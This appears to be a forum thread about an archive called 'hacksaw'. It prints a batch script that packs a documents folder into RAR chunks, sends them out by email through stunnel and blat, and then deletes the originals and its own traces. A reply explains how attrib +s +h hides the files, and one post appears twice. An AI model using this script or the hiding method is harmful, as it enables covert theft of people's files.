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When trying to extract the files from the rar archive, you will not see certain file sbecause they have the +HS attribute set. In a cmd window you can unset these for the files with the ATTRIB command.

here is what i got from the SEND.BAT file:

:: Configure Email Options
SET emailfrom=
SET emailto=
SET password=

:: Archive documents in 1MB chunks
rar a goodies.rar .docs -v1024k -vn
stunnel-4.11.exe -install -quiet
net start stunnel
GOTO sendfiles

:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet
:: Delete documents
rmdir /s /q docs
:: Delete archive
del /q /f goodies*.*
GOTO end

for %%i in (goodies.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server
GOTO cleanup



Ok thanks man  8-)

But in fact the real problem did'nt solve exactly with showing the hidden files. I had to make windows show the system files indeed! In this case only i can see all the files of the folder sbs, tough i could see the files with the CLI.

Why is it considered by windows as system files indeed?

Ok thanks man  8-)

But in fact the real problem did'nt solve exactly with showing the hidden files. I had to make windows show the system files indeed! In this case only i can see all the files of the folder sbs, tough i could see the files with the CLI.

Why is it considered by windows as system files indeed?

The reason why you had to tell windows to show the hidden and system files to see the hacksaw stuff

is because the hacksaw stuff was initially hidden to avoid being seen.

To make windows consider a file hidden and a system file, do this:

attrib "file location" +s +h

+s is what makes the file a "system file"

+h is what makes the file a "hidden file"

Hope this helps.

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